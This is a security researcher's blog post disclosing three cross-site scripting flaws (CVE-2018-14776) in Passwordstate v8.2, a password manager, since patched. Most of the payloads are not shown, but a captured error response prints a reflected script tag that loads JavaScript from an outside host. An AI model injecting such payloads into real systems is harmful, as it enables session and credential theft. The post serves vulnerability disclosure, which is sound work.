I recently performed a penetration test against an instance of Clickstudios Passwordstate, a web based Enterprise Password Management solution.
During testing, three instances of cross-site scripting were identified. This blog post is intended to serve as public disclosure of the issues for CVE-2018-14776, which have since been patched by Clickstudios.
Testing was performed against Passwordstate v8.2 (Build 8256)
1. Uploaded Files
The following ‘test.html’ file was uploaded with the payload below, demonstrating persistent XSS:
2. External Links
An authenticated user has the ability of adding a link to an external URL through the user interface. It was possible to submit an external URL containing the following payload:
This link containing the persistent XSS payload only appears to be viewable to the user that creates it. Based on this it would only be useful in certain scenarios, for example if an attacker compromised an account and added a malicious payload link in the hopes that a legitimate user would later click it.
3. Error Messages
A number of different pages that accept JSON would return an error when invalid JSON was submitted, in this case our reflected XSS payload. For example, upon submitting a POST request to /passwords/shared/folder.aspx the following was sent in the DocumentsDock_ClientState parameter:
This request could only be submitted as an authenticated user and resulted in the following response from the application:
HTTP/1.1 200 OK Cache-Control: no-cache,max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache,no-cache Content-Type: text/plain; charset=utf-8 Expires: -1,Thu, 01 Jan 1970 00:00:00 GMT Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-UA-Compatible: IE=edge Date: Tue, 15 May 2018 05:24:21 GMT Connection: close Content-Length: 97 83|error|500|Invalid JSON primitive: <script src="https://www.datacomtss.com.au/x.js"></script>.|
This confirms that the external proof of concept script is being executed when using Internet Explorer.